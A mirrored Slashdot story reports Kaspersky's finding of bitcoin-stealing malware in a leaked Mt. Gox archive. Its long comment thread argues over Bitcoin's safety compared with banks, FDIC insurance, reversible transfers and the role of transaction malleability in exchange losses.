Slashdot Mirror


Kaspersky: Mt. Gox Data Archive Contains Bitcoin-Stealing Malware

itwbennett writes "An archive containing transaction records from Mt. Gox that was released on the Internet last week also contains bitcoin-stealing malware for Windows and Mac, say researchers at Kaspersky Lab who have analyzed the 620MB file called MtGox2014Leak.zip. The files masquerade as Windows and Mac versions of a custom, back-office application for accessing the transaction database of Mt. Gox. However, they are actually malware programs designed to search and steal Bitcoin wallet files from computers, Kaspersky security researcher Sergey Lozhkin said Friday in a blog post."

169 comments

  1. Really? by SternisheFan · · Score: 3, Funny

    Oh yes, I totally trust easily manipulated computer bits over paper money.

    1. Re:Really? by Anonymous Coward · · Score: 4, Interesting

      ...except this was no different from someone doing the same thing to a bank. Your argument is invalid

    2. Re:Really? by SternisheFan · · Score: 2

      ...except this was no different from someone doing the same thing to a bank. Your argument is invalid

      Real coin has worked for thousands of years. Bitcoins are a new, totally unproven currency. Out of the gate, their track record sucks so far. Reliable? I'd trust my 3rd cousin Wilfred to pay me back first.

    3. Re:Really? by Anonymous Coward · · Score: 0

      Banks are properly regulated and insured, so no, a bank's customers would not lose money due to any digital shenanigans.

    4. Re:Really? by ttucker · · Score: 4, Informative

      ...except this was no different from someone doing the same thing to a bank. Your argument is invalid

      This is totally false. Almost all bank transactions are reversible in the case of fraud, no bitcoin transactions are ever reversible.

    5. Re:Really? by Ralph+Wiggam · · Score: 4, Insightful

      How often does someone break into a bank vault? Almost never. When someone "robs a bank" they're just taking a couple thousand bucks from a teller drawer, which is negligible.

      When someone steals real money from a bank, it is insured by the FDIC.

      The impact is way, way worse with bitcoin.

    6. Re:Really? by Anonymous Coward · · Score: 0

      The difference is, this has happened to a bigger swath of bitcoin than it ever could to a bank.

    7. Re:Really? by Anonymous Coward · · Score: 1

      Well, except that none of the bitcoin "problems" or exploits have been with bitcoin itself. It's always some 3rd party poorly coded bullshit software (eg. exchanges, pools, online wallets, etc).

      So far no one has managed to exploit bitcoin itself.

    8. Re:Really? by SternisheFan · · Score: 3, Interesting

      Does it really matter 'how' it happened? People are out of money, big time money. Bitcoin has not proven itself to be a reliable way to store money. Blame whatever you wish to. It is not secure to place my money in. And now Bitcoin will have to overcome the "once burned, twice shy" hurdle.

    9. Re:Really? by exomondo · · Score: 1

      ...except this was no different from someone doing the same thing to a bank.

      It's totally different! Unlike a normal bank bitcoin transactions are irreversible, untraceable and the deposits are uninsured, the whole thing is unregulated and anonymous by design.

    10. Re:Really? by bill_mcgonigle · · Score: 2

      Almost all bank transactions are reversible in the case of fraud, no bitcoin transactions are ever reversible.

      The blockchain transactions aren't reversible, but neither are bank ledger transactions. At the customer service level, both can be refunded (even when it's a bad idea: see Mt. Gox). It's like like in USD's you're going to get the same bills back, but that's why currency is fungible.

      --
      My God, it's Full of Source!
      OUTSIDE_IP=$(dig +short my.ip @outsideip.net)
    11. Re:Really? by zieroh · · Score: 2, Funny

      Real coin has worked for thousands of years.

      Yeah. And over those thousands of years, real coins have proved impervious to all manner of theft.

      --
      People who say "sheeple" have about as much sophistication as an AOL user, and in fact are probably actually AOL users.
    12. Re:Really? by DarkOx · · Score: 1

      Except Mt.Gox was never a bank, if anything it's more comparable to a broker, and if there was a major theft leading to your broker going bankrupt there would be no FDIC insurance for you. Any cash you had in your account -- gone, and security not settled and in your name gone. Unless the property was recovered somehow by authorities.

      --
      Repeal the 17th Amendment TODAY! Also Please Read http://www.gnu.org/philosophy/right-to-read.html
    13. Re:Really? by mysidia · · Score: 2, Insightful

      Real coin has worked for thousands of years. Bitcoins are a new, totally unproven currency.

      Except "real coin" isn't what we have --- we have fiat, which is no longer backed by anything. The fed and the banks just will "federal reserve" monopoly bucks into existence.

      When you go to a store, and swipe your credit card.... you think those are "real coins" you are paying with??

      NOPE! And I assure you, this mode of payment is not thousands of years old.

      For every one of your dollars you put in the bank, your bank lent out 10 imaginary ones. Chances are you didn't even put in "real dollars though" ---- you received money through DD or "deposited a check" probably from an employer or customer corresponding to a "digital balance", that never had to be realized as real physical anything, because they were also most likely all paid by credit card, check or DD.

    14. Re: Really? by Anonymous Coward · · Score: 1

      Bit coin is reliable. The shitty exchanges are not.
      If you have someone access to your paper wallet then the effect would be the same.

    15. Re:Really? by mysidia · · Score: 2

      Bitcoin has not proven itself to be a reliable way to store money.

      Neither have dollars..... you leave them lying around on your kitchen table, and someone can break in while you're away and steal them all.

      Also... if you deposit them in an investment firm who is not FDIC insured, and they go bankrupt, you might lose them all, just like with Gox.

      Plenty of people had their banking details stolen every day. Ever heard of ATM skimmers?

    16. Re:Really? by mysidia · · Score: 2

      no bitcoin transactions are ever reversible.

      No cash transactions are ever reversible.

      [And Bitcoin is a form of cash.]
      There, fixed it for you.

    17. Re:Really? by sphealey · · Score: 3, Informative

      - - - - - - NOPE! And I assure you, this mode of payment is not thousands of years old. - - - - - -

      Another cryptocoin fanatic who hasn't bothered to read a detailed history of money, much less a standard theory of money textbook. Hint: more than one ancient language has been deciphered by translating magic documents known as "letters of credit".

      sPh

    18. Re:Really? by Kjella · · Score: 3, Informative

      This is totally false. Almost all bank transactions are reversible in the case of fraud, no bitcoin transactions are ever reversible.

      That's generally false for wire transfers. Even if you don't do a wire transfer chances are they have some sort of money mule who'll wire the money to Nigeria and that's the last you'll see of them. The mule is of course a hobo or something with no assets to seize. In general if the receiving bank has accepted the money, it's gone. I see a few people saying you should be able to reverse one within 72 hours, but in practice I don't see anybody saying they've actually successfully reversed such a scam.

      --
      Live today, because you never know what tomorrow brings
    19. Re:Really? by mysidia · · Score: 3, Informative

      When someone steals real money from a bank, it is insured by the FDIC.

      Actually.... loss due to fraud, theft, or accounting errors, are the iconic examples of a bank loss that IS NOT FDIC covered.

      FDIC insures the funds against the bank losing the money through the ordinary course of business (market risks -- such as the risk of borrowers defaulting on the loan, and the bank, therefore losing the principal required to cover their obligations to depositors).

      WP has some other examples of items not insured by the FDIC, also not covered:

      Investments backed by the U.S. government, such as US Treasury securities

      The contents of safe deposit boxes. -- Even though the word deposit appears in the name, under federal law a safe deposit box is not a deposit account – it is merely a secured storage space rented by an institution to a customer.
      Losses due to theft or fraud at the institution. These situations are often covered by special insurance policies that banking institutions buy from private insurance companies.

      Accounting errors. In these situations, there may be remedies for consumers under state contract law, the Uniform Commercial Code, and some federal regulations, depending on the type of transaction.

      Insurance and annuity products, such as life, auto and homeowner's insurance.

    20. Re:Really? by mbkennel · · Score: 3, Insightful

      | Except "real coin" isn't what we have --- we have fiat, which is no longer backed by anything.

      Other than the collective agreement and binding contracts by the most powerful governments and private individuals on Earth, and a deep market for liquid and tradable property as well as productive real property.

      Fiat currency is not "by fiat" automatically exchangeable for a certain quantity of a certain kind of property with no market fluctuation allowed. But that doesn't mean it's not 'backed' by anything.

      Bitcoin isn't by fiat exchangeable for anything either---it only has constructed scarcity.

      | The fed and the banks just will "federal reserve" monopoly bucks into existence.

      Not quite "at will" but in specific economic & financial circumstances deemed to be legal and essential parts of commerce & business.

    21. Re:Really? by mysidia · · Score: 1

      The difference is, this has happened to a bigger swath of bitcoin than it ever could to a bank.

      Not if the 'bank' was as negligent as Mt.Gox was, and still managed to elude any regulators.

    22. Re:Really? by Kris_J · · Score: 1
      • These are not "easily manipulated", they are cryptographically secure.
      • There is zero counterfeit bitcoin. You can't say the same about paper currency.
      • This isn't about the security of bitcoin, it's about phishing and trojans.
    23. Re:Really? by beelsebob · · Score: 1

      Right... because this happens so often with banks. We see a bank go pop, and everyone's money disappear every month or so, don't we.

      And you know... the government doesn't insure money held in bank accounts. It's completely the same.

    24. Re:Really? by Anonymous Coward · · Score: 0


      Neither have dollars..... you leave them lying around on your kitchen table, and someone can break in while you're away and steal them all.

      Plenty of people had their banking details stolen every day.
      Ever heard of ATM skimmers?

      If it's on my table, I hope your shotgun is bigger than mine.

      Bitcoin is not an insured bank, gone means gone with no legal recourse. Yes, skimmers exist. Credit card companies have far more protection against fraud. What is your 'pro Bitcoin' argument again?

    25. Re:Really? by wallsg · · Score: 1

      Except Mt.Gox was never a bank, if anything it's more comparable to a broker, and if there was a major theft leading to your broker going bankrupt there would be no FDIC insurance for you. Any cash you had in your account -- gone, and security not settled and in your name gone. Unless the property was recovered somehow by authorities.

      Incorrect. SIPC (Securities Investor Protection Corporation) insurance protects cash up to $250,000 and cash and securities up to $500,000 per account. Most brokerage firms carry additional insurance, usually called "excess SIPC coverage".

      Mt. Gox was the tavern bookie that you left your winnings with, with no insurance or regulation at all.

    26. Re:Really? by wallsg · · Score: 1

      And I totally agree with your signature calling for the repeal of the 17th Amendment.

    27. Re:Really? by Opportunist · · Score: 1

      Actually, yes, it does matter. That's like saying "online banking is insecure" when in fact pretty much all exploits on online banking (at least in Europe) worked only due to negligence on the user's side. I know of not a single case where it was actually the bank's fault. And trust me, there are FAR, FAR more cases than you'll ever hear about (banks tend to pay, i.e. take over the cost for the users' idiocy to hush it up).

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    28. Re:Really? by QilessQi · · Score: 5, Insightful

      As I understand it, the Mt.Gox fiasco was due in part to a hacker's ability to exploit transaction malleability in Bitcoin. Yes, Gox should have updated their software, but the Bitcoin protocol had a known weakness in it, and we've seen the result. But let's leave that aside for a minute:

      The real problem is that people have been able to exploit the Bitcoin ecosystem, which does not yet have the resilience to deal with the way human beings expect to be able to work with money.

      If you want to create a currency for everyone, then that currency has to be simple and secure even for new adopters. Part of creating a good system (of any sort) is shielding users from serious consequences. If someone in another state charges $3000 to my credit card to buy pharmaceuticals, I'll get a call. If a legitimate vendor charges my card but fails to deliver the promised goods, Visa or MasterCard will give me my money back after one phone call and a followup letter. If my bank is robbed, my deposits are FDIC insured.

      Bitcoin enthusiasts are describing exchanges as being "just like banks", and then blaming the users for treating them like banks and keeping their coins there. Instead of castigating folks for not solely printing their wallets out on computers that have been rebooted while disconnected from the Internet for that express purpose, maybe the Bitcoin community could take a step back and find a way to make the entire ecosystem more human-proof.

    29. Re:Really? by Stormy+Dragon · · Score: 1

      For the most recent year in which statistics have been published (2011), 5,086 times, resulting in a loss of $38,343,501.96, only $8,070,886.97 was ever recovered.

      http://www.fbi.gov/stats-servi...

    30. Re:Really? by QilessQi · · Score: 5, Insightful

      And yet, people are able to go to credit card companies and banks, dispute the fraudulent transactions, and get the money back. Because our commerce systems have evolved to cope with the reality of fraud and, consequentially, the necessity of insuring deposits through mechanisms like FDIC.

      Like it or not, the Mt.Gox fiasco demonstrates that Bitcoin is not yet ready to serve as a desirable system of currency for the masses. For all the talk about the transparency of the blockchain, no one has been able to restore those stolen coins to the hands of their rightful owners.

      Maybe someday people will be able to say, "thank God I used cryptocurrency for those transactions!". But that day is not today.

    31. Re:Really? by Stormy+Dragon · · Score: 1

      Between 2008 and 2012, 465 separate US banks failed:

      http://en.wikipedia.org/wiki/L...

    32. Re:Really? by Anonymous Coward · · Score: 0

      What is your 'pro Bitcoin' argument again?

      I use linux.

    33. Re: Really? by Gunboat_Diplomat · · Score: 2

      Bit coin is reliable. The shitty exchanges are not. If you have someone access to your paper wallet then the effect would be the same.

      Why compare to paper? If I have bitcoin stealing malware on my computer (and there is like 150 variants of that in the wild) it will get the bitcoin even if I keep my wallet offline and encrypted, because I have to access it sometime. But, it won't get my online banking money, because they use a challenge-response protocol. Very different.

    34. Re:Really? by Thetawaves · · Score: 1

      Bitcoin theft is still theft. There is plenty of legal recourse.

    35. Re:Really? by Anonymous Coward · · Score: 1

      You think the money in your bank account is paper, and not easily manipulated computer bits? That's so cute.

    36. Re:Really? by aardvarkjoe · · Score: 1

      And if you read the article you linked to, you'll realize that people's deposits didn't just disappear, even when the banks failed.

      --

      How can we continue to believe in a just universe and freedom to eat crackers if we have no ale?
    37. Re:Really? by ThatsMyNick · · Score: 0

      Keep a paper bitcoin wallet. It's as simple as that.

    38. Re:Really? by Anonymous Coward · · Score: 0

      Bitcoin is still the wild west of the internet and anybody who isn't ready for that should not venture out there and take those risks.

      Easy security and other consumer friendly features like arbitrators who provide consumer protection via multi-signature transactions are coming. Right now there ain't no law in deadwood.

    39. Re:Really? by Anonymous Coward · · Score: 0

      Anyone who says fiat currency is not backed by anything is an ignorant idiot and is to be ignored.

      (Hint : Fiat is backed by the assets of a country)

    40. Re:Really? by mysidia · · Score: 1

      lol...are you actually trying to make the argument that dollars are just as unsafe as bitcoin?

      As unsafe as bitcoin against WHAT?

      There are an infinite number of threats against both. Both have certain fragilities.

      Therefore... there is no basis of comparison for safety, except when you identify what kinds of shocks or unusual events that you are most concerned about.

      But they both seem to be pretty darn risky and likely to be stolen, when we are talking about possibilities of physical theft and certain kinds of digital theft....

    41. Re:Really? by Anonymous Coward · · Score: 0

      Of course real coins can be stolen. Which is why we don't keep large amounts of cash on hand. We deposit money in banks that are insured so that WHEN people steal money or lose it...which happens invariably, as you point out...depositors have some recourse aside from the cold comfort of knowing the miracle of the "free market" will eventually punish the thieves.

    42. Re:Really? by TubeSteak · · Score: 2

      Except "real coin" isn't what we have --- we have fiat, which is no longer backed by anything.

      And once we introduced central banking, fiat has worked out a lot better than "real coin" did before we abandoned it.
      I've yet to hear a satisfactory response to the basic question of why we should go back to a deflationary currency like gold.
      If you're feeling especially pugnacious, feel free to explain how we'd go about re-implementing [gold] while avoiding the problems of its past and fixing the actual (and perceived) problems of the present.

      --
      [Fuck Beta]
      o0t!
    43. Re:Really? by ahabswhale · · Score: 3, Insightful

      lol...have you ever heard of FDIC? Consumer protections? None of these things apply to bitcoin and never will. My bank can be vaporized out of existence and it wouldn't do shit to me.

      --
      Are agnostics skeptical of unicorns too?
    44. Re:Really? by Anonymous Coward · · Score: 0

      Bitcoin theft is still theft. There is plenty of legal recourse.

      There are many people out of pocket that would like to know what their recourse is.

    45. Re:Really? by Anonymous Coward · · Score: 0

      So you're not just making a copy of the bits and bytes?

    46. Re:Really? by Anonymous Coward · · Score: 0

      No, you're not. You're also modifying bits and bytes in the distributed ledger on all computers of Bitcoin network.

      That's what makes it different from piracy - if me pirating your favourite "Big Butt Mamas #17" made your legit copy unwatchable, it'd be theft.

    47. Re:Really? by Anonymous Coward · · Score: 0

      hm so good luck with getting people to wanna live there... there also ain't no gold in them thar hills anymore!!

    48. Re:Really? by Chas · · Score: 1

      Yet you can go to your bank any time and be guaranteed payout in real dollars.
      And you have near-zero chance of being screwed over the way these people are by collapsing exchanges.
      How likely is it that the US (and thus FDIC) are going to collapse tomorrow, or next week, or a year from now? Maybe there's a chance of it happening, but your chance of getting hit by lightning while simultaneously winning the lottery is better.
      How likely is it that one or more of these exchanges is going to fold up and disappear with any funds you may have invested (dollars or BTC). Judging on recent trends, the probability is a HELL of a lot closer to One than it is to Zero.

      BTC itself is a Ponzi scheme.
      Exchanges are confidence scams.

      Can people make money in both situations? SURE!
      Just don't fool yourself as to what you're doing.

      --


      Chas - The one, the only.
      THANK GOD!!!
    49. Re:Really? by CanHasDIY · · Score: 1

      No cash transactions are ever reversible.

      They are if you keep the receipt.

      --
      An enigma, wrapped in a riddle, shrouded in bacon and cheese
    50. Re:Really? by Anonymous Coward · · Score: 0

      This is totally false. Almost all bank transactions are reversible in the case of fraud

      A friend just lost $20,000 because of a fraudulent wire transfer. The bank says they have a signature and a copy of the ID, and so refuse to reverse it. Would it be OK if they contacted you so you could straighten them out?

    51. Re:Really? by Anonymous Coward · · Score: 0

      If it were that easy to rob a bank, I wouldn't trust banks either.

    52. Re:Really? by Anonymous Coward · · Score: 0

      Except the part that online bitcoin transactions are analogous to online or wire currency transactions not cash. Online or wire transactions in most currencies are reversible or failing that covered by fraud protections or FDIC if proven fraudulent.

      Bitcoin transactions are analogous to cash transactions when printed out and physically handed to a person.

    53. Re: Really? by mlts · · Score: 4, Insightful

      BitCoin exchanges are where banks were, pre-Great Depression. They go under, you lose your savings, period. It was only under FDR that bank losses were covered by the US government under FSLIC/FDIC/NCUA insurance.

      The BitCoin protocol has not had any attacks. It has been exchanges that were poorly run or attacks on the computers/endpoints storing BitCoin wallets. The BitCoin core protocol has proven to be secure, although there is always concern about one single party reaching the magic 51% mark.

    54. Re: Really? by Anonymous Coward · · Score: 1

      There are an equal number of trojans and other malware designed specifically to steal money from people using online banking.

      But still.. you are blaming the way the exchanges were run on bitcoin itself. That is as dumb as saying paper money is unsafe because people rob banks (which they do https://en.wikipedia.org/wiki/...).

    55. Re:Really? by Anonymous Coward · · Score: 0

      Good luck getting a jury to believe that. The average Joe sees a photo on the screen of a piece of paper with a QR code on it, thinking that BitCoin is a modified paper currency. It wouldn't be hard for a defense attorney to say that it was as big a deal as a swindle in World of Warcraft where someone sold a blue item for a purple's price.

    56. Re:Really? by click2005 · · Score: 1

      Bitcoin is not an insured bank, gone means gone with no legal recourse. Yes, skimmers exist. Credit card companies have far more protection against fraud. What is your 'pro Bitcoin' argument again?

      US Dollars are also not a bank or a credit card company so why are you trying to compare a form of currency to something it's obviously not?

      --
      I am a free slashdotter. I will not be modded, blogged, DRM'd, patented, podcasted or RFID'd. My life is my own.
    57. Re:Really? by Anonymous Coward · · Score: 0

      ...except this was no different from someone doing the same thing to a bank. Your argument is invalid

      Right, because when I request a copy of my transaction data from my bank, it comes with malware implanted in the paper.

    58. Re:Really? by Anonymous Coward · · Score: 0

      CBA to search for it, but a few months ago there already was a court case in USA against a conman who collected BTC from easy trusting marks and ran.

      He tried to get out of court by playing the same "Bitcoin is no money, can't prosecute me, nyahnyahnyah!" card you propose, but got slapped down by the judge.

    59. Re:Really? by Anonymous Coward · · Score: 0

      It matters, in the same way that it matters whether or not your bank hires actual security guards or a safe made of thick steel rather than plastic. If your bank kept your money in a very insecure vault and the money was then stolen you would blame the bank, not the currency. Bitcoin is no different.

    60. Re:Really? by Anonymous Coward · · Score: 0

      Transaction malleability does not allow you to magically steal coins. Blame the website that allowed a supposed cold wallet to get drained automatically. There's not even any actual evidence that they were stolen in a hack. Karpeles could have just walked off with them.

    61. Re:Really? by Anonymous Coward · · Score: 0

      Better send that news over to the US federal reserve.

    62. Re:Really? by Anonymous Coward · · Score: 0

      Except "real coin" isn't what we have --- we have fiat, which is no longer backed by anything.

      If you think that's true, then you have no real understanding of fiat currency at all.

      For every one of your dollars you put in the bank, your bank lent out 10 imaginary ones.

      You obviously don't understand how banks work either.

      you received money through DD or "deposited a check" probably from an employer or customer corresponding to a "digital balance", that never had to be realized as real physical anything

      You most certainly don't understand how accounts work at all. Put simply, yes all that money does have a physical bill or coin somewhere.

    63. Re:Really? by Anonymous Coward · · Score: 0

      The blockchain transactions aren't reversible, but neither are bank ledger transactions.

      If you think that's actually a true statement, then I've got a Nigerian Prince who needs help getting his money to a safe country, and is going to send you a Cashier's Check for $1,000,000. Just deposit it into your account, then keep $100k for yourself and have your bank send a Cashier's Check for $900,000 to a bank in this other country.

      Bank transactions not only CAN be reversed, they frequently are. But just in case you need a full explanation, here's what happens: The check you wrote gets cashed out in some country where they don't care about your country's laws, shortly after that the original check you received gets reversed because it's fraudulent. You can't get the $900,000 back because the bank in the country you sent it to gives your bank the finger, or is itself an empty "shell" company which doesn't exist... and you're the one stuck owing the $900,000 to YOUR bank in YOUR country.

    64. Re:Really? by Anonymous Coward · · Score: 0

      What about 2008????

    65. Re:Really? by Anonymous Coward · · Score: 0

      Your third point is incorrect, there is quite a bit of currency floating around which has never had a bill or coin minted for it. The federal reserve guarantees banks an amount of money, and that money is transacted between banks as a result of everyday activity of customers. The reserve does guarantee that the funds can be minted at will, but the amount of actual currency in circulation is dwarfed by that which is just numbers on ledgers.

    66. Re:Really? by Anonymous Coward · · Score: 0

      What's the alternative? Fiat? Ask the Cypriots how secure that is!

    67. Re:Really? by Anonymous Coward · · Score: 1

      Sure, let's. People with up to 100K EUR got it back, and those who had more, got 40% of their savings seized.

      Now let's hear it for Bitcoin side. So, how much did all the MtGox users get refunded? How about all the other crashed Bitcoin "enterprises"?

      I think about the only big case where third party properly refunded BTC investors was, ironically, ponzi.io.

    68. Re:Really? by gmhowell · · Score: 1

      Did you have a point to your rant?

      --
      Jesus was all right but his disciples were thick and ordinary. -John Lennon
    69. Re:Really? by Stormy+Dragon · · Score: 1

      The fact someone showed up later to replace the money doesn't change the fact that the money disappeared. And the FDIC doesn't cover money lost due to theft or fraud. How about people who invested with people like Bernie Madoff?

    70. Re:Really? by ThatsMyNick · · Score: 1

      Not sure why that was moderated as overrated. Just to be clear that was not a joke. If you create paper wallets, and store your bitcoins in them (in whatever denominations you like, I use 1 BTC per wallet), no virus or malware or some e-wallet getting hacked, can get to your bitcoins.

    71. Re:Really? by ras · · Score: 3, Interesting

      As I understand it, the Mt.Gox fiasco was due in part to a hacker's ability to exploit transaction malleability in Bitcoin. Yes, Gox should have updated their software, but the Bitcoin protocol had a known weakness in it, and we've seen the result.

      Your understanding is wrong. The mtgox fiasco didn't occur because the miners accepted malleable transactions. It happened when the miners stopped accepting transactions that were malleable. Well, not all malleable transactions. But they did stop accepting the invalid transactions mtgox was generating. Generating those invalid transactions was mtgox bug 1. Mtgox bug 2 was when people fixed their bad formatting and they were accepted into the block chain, mtgox software didn't recognise them. Mtgox bug 3 was that they then repeated the same transaction without doing a full audit of their ledger to verify some other mistake hadn't been made. Doing it twice is a bit of a risk given bitcoin transactions aren't reversible. But to be fair, mtgox said they authorised such double spends manually.

      But ... it is almost inconceivable that a human authorised $350M in double spends without getting suspicious. So that brings us to the unknown mtgox bug 4. Somehow, they managed to figure out a way of authorising $350M in double spends without anybody noticing. Surely this must qualify for the Guinness Book of Records greatest accounting cluster fuck of all time.

      But bitcoin protocol bug - sorry no, not this time. Bitcoin offers very few guarantees. I guess a known mining rate, whatever appears on the audit trail is the one and only correct history of bitcoin, and that history will never change are the main three. In the early days, back when people sent 1000's of bitcoins to pay for a pizza, there were bugs in the bitcoin software that meant those guarantees weren't upheld. But it was also a nicer time. It was when bitcoin was just a toy friends played with, so such mistakes could be and were always fixed. No bitcoin has ever been permanently lost because of such bugs.

      I know I shouldn't care when a person on the internet is wrong. Not just a little bit wrong, but tinfoil hat type wrong as you are in this case. But seeing tinfoil hat comments being modded up to +5 is difficult to swallow silently.

    72. Re:Really? by ras · · Score: 1

      How often does someone break into a bank vault? ... The impact is way, way worse with bitcoin.

      How do you know? It has never happened. There is only one bitcoin banker - it's the miners. There is only one bank statement issued by those bankers, and that's the block chain. So far the miners have never lost a bitcoin. You can verify that yourself. The block chain is a public document. I think it's fair to say bitcoin is built on the fact that they never will. It's a pretty safe bet, because if the bitcoin software adheres to the protocol description, mathematically, they never can.

      If you give your bitcoins to a broker like mtgox, well anything can happen. In fact if you can name something an imbecile or criminal could do to you if you trusted them with your money, then in the bitcoin world it probably has happened. Some brokers didn't bother with backups. Some were minors, and literally stole the bitcoins they were given. Some (including mtgox) leaked passwords they were given. The list is beyond belief, and is responsible for all the headlines you see.

      But your fantasy of the vault all bitcoin is stored in being raided - that has never happened. One of the beauties of bitcoin is it is probably impossible. Indeed bitcoin is immune to most of the foibles of normal bankers. The bitcoin banker doesn't loan bitcoins. It doesn't make mistakes. Unlike fiat currencies the people who control it can't inflate it into worthlessness.

    73. Re:Really? by sfcat · · Score: 1

      Right, cause this never happened...in the last 12 months?

      http://www.bbc.com/news/busine...

      Look, people are involved and people are fallible and technology can't really prevent that. BTC as a protocol is solid and wasn't compromised. The very immature institutions that have sprung up around BTC are currently failing at their task that you have every right to criticize them. Hopefully the market will sort out some winners that can function in their institutional roles in the BTC ecosystem safely and securely.

      But don't confuse BTC for a bank and right now don't confuse it for a currency. Currently, BTC is a commodity because of its volatile value against fiat currencies. Someday that might change at which point BTC begins behaving like a currency. It fills/will fill a real need for many people, probably not you but others and that's what really matters here. When the BTC institutions can behave in as secure and trustworthy a way as other financial institutions (and really is that a very high bar anymore) then it will be very much like any other currency with a measurable market cap and liquid exchanges. Until then it's volatile and probably only for miners and speculators (and gamblers).

      And a ponzi scheme always needs an increasing amount of money to keep going (ie next year more $$ needs to go in than last year). That doesn't seem to be a feature of the Bitcoin ecosystem. Ask any miner and they've gone through peaks and valleys due to volatile prices and changing difficulties that brings the system into balance. It always balances out, the good and the bad (ie bad you paid 47 BTC for an ASIC miner in August 2013 that probably will never mine 47 BTC, good your other 147 BTC are now worth 80k USD). It's hard and rare to get rich honestly with BTC but you can make a bit of extra cash right now and that's a feature of a healthy and growing market.

      --
      "Those that start by burning books, will end by burning men."
    74. Re:Really? by ras · · Score: 2

      This is totally false. Almost all bank transactions are reversible in the case of fraud, no bitcoin transactions are ever reversible.

      Only for some definition of "totally" that does mean 100% of transactions. And when you get to the space bitcoin is trying to compete in - international direct transfers, your "totally" becomes close to 0%.

      From http://www.globalgrainsvn.com/GGS/MT103.html:

      SWIFT MT-103

      SWIFT MT-103s are the most commonly used form of SWIFT communication, and one which many people will have utilized without even knowing it. For most bank customers, they are known not as MT-103s at all, but rather as wire transfers, telegraphic transfers, or SWIFT transfers. A SWIFT MT-103 is used by the bank when its customers wish to make payment to customers of another bank in another country.

      How Do I Send A MT-103 ?

      An MT-103 is the most commonly utilized type of SWIFT message. In order to send one, simply contact your bank and let them know that you would like to send a telegraphic or wire transfer. They will require the recipient’s bank details, and also the SWIFT code of the recipient’s bank. If the recipient is not aware of their bank’s SWIFT code, it is a fairly simple matter for the recipient to inquire at their bank.

      Are MT-103s Reversible?

      No. Once a MT-103 has been made, it is not reversible. Sending a MT-103 is the equivalent of handing someone cash in many respects, so due care should be taken when initiating a MT-103.

    75. Re: Really? by Anonymous Coward · · Score: 1

      Except the money in your bank account is FDIC insured. Bitcoin? Good luck with that.

    76. Re:Really? by ttucker · · Score: 2

      This is totally false. Almost all bank transactions are reversible in the case of fraud

      A friend just lost $20,000 because of a fraudulent wire transfer. The bank says they have a signature and a copy of the ID, and so refuse to reverse it. Would it be OK if they contacted you so you could straighten them out?

      Sure, I will help them figure out how to hire a lawyer. Or you can pass the message along.

    77. Re: Really? by Anonymous Coward · · Score: 0

      It doesn't matter how many ways you frame it:

      1) The most reliable way of storing my money is with a party who employs dozens of people to make sure my stuff isn't taken;

      2) And who is regulated by law into making sure that they do this responsibly;

      3) And who will pay out of pocket anyway if my money is lost thanks to someone else;

      4) And who has the slack taken up by government if the whole institution collapses, so I /still/ don't lose my money.

      tl;dr saving bitcoin is like dealing with century-old banks.

      And I would of course rather store my money with a regular bank than anything bitcoin, because bitcoin keeps a transaction history, whereas real money is more anonymous (god knows how the doublethink machine managed to get bitcoin thought of as "untraceable", but Internet Libertarianism has become like a religion, where every real world factor is simplified away until the desired result is concluded).

    78. Re: Really? by Anonymous Coward · · Score: 0

      WTF are you on about. My bank has access to all my money and guess what? None of it goes missing.

    79. Re:Really? by bentcd · · Score: 1

      (...) But to be fair, mtgox said they authorised such double spends manually.

      Did this manual process by any chance involve a "Yes To All" button?

      --
      sigs are hazardous to your health
    80. Re:Really? by mvdwege · · Score: 0

      Really? So the depositors got their money back from government-backed insurance?

      Fuck off back to La-La-land, please.

      --
      "I know I will be modded down for this": where's the option '-1, Asking for it'?
    81. Re:Really? by Anonymous Coward · · Score: 0

      > The mule is of course a hobo or something with no assets to cease.
      *seize

    82. Re:Really? by Anonymous Coward · · Score: 0

      My bank is insured against the loss of my money. How many people have gotten their Bitcoins back?

    83. Re:Really? by swb · · Score: 1

      Does this prove the grandparent's point, though?

      The average take is only $7,539.02.

      Even though only 20% is recovered, the clearance rate for bank robberies is like 60%. This says to me that the amounts taken are so small that even if you ultimately get caught, the amount stolen is small enough that a lot of it gets spent quickly before the robbers are caught. It doesn't seem likely that most bank robbers are doing 20 year Federal prison sentences to recover a haul of $7500 when they get out.

    84. Re: Really? by xvan · · Score: 1

      You're proposing this from an American point of view... There are countries with other issues. Banks collapse in the rest of the world, and people don't get their money immediately back. As banks sometimes collapse in inflationary periods, you are effectively being stolen by banks and governments.

    85. Re:Really? by Anonymous Coward · · Score: 0

      except no less than 20 posts corrected your misinformation.

      at least 3 of 5 of your "facts" were incorrect.

      mod 5? I wouldn't trust slashdot mods any more than I'd trust bitcoin.

      bitcoin has serious problems, but your analogy is severely broken, and does nothing to describe truth.

    86. Re: Really? by Anonymous Coward · · Score: 0

      The value and stability of currency isn't an intrinsic thing. It comes with the backing of authority, and banks and exchanges that are regulated and have standards. All these things bitcoin lacks, because it's essentially an electronic Beanie Baby.

    87. Re:Really? by sociocapitalist · · Score: 1

      lol...have you ever heard of FDIC? Consumer protections? None of these things apply to bitcoin and never will. My bank can be vaporized out of existence and it wouldn't do shit to me.

      Your bank probably got bailed out already and you probably helped pay for it so yes, it does shit to you. Probably not as much as if it failed directly (depending on your bank account balance at the time) but you were not unaffected.

      --
      blindly antisocialist = antisocial
    88. Re:Really? by QilessQi · · Score: 2

      Not so fast, Ras. I said that transaction malleability was exploited by hackers; it was. My only error was confusing the Mt.Gox incident with the Silk Road 2 incident. Here, from the very first paragraph of this Tech Crunch article ( http://techcrunch.com/2014/02/... )

      Silk Road 2 moderator Defcon reported in a forum post that hackers have used a transaction malleability exploit to hack the marketplace. The hackers stole over 88,000 4474.26 bitcoins worth $2,747,000, emptying the site’s escrow account.

      The site used a central escrow service to send bitcoins from buyers to sellers. The hackers exploited the transaction malleability bug – essentially a way users can mask transfers and ask for the same amount of BTC multiple times – to clean out this wallet. This is the same bug that forced Mt. Gox to halt all withdrawals and recent updates have made average bitcoin wallets secure against this sort of attack. According to the site, hackers used the Silk Road’s automatic transaction verification system to order from each other and then request refunds for unshipped goods. Hackers were able to use the transaction malleability bug because the Silk Road used only transaction ID to confirm the transfer of bitcoins. You can read more about the problem here.

      The fact that the Bitcoin software no longer has this bug does not change the fact that it once did have this bug, and that this bug has been exploited. I think I can be forgiven for having confused one multimillion dollar Bitcoin loss with another caused by the same underlying problem. :-)

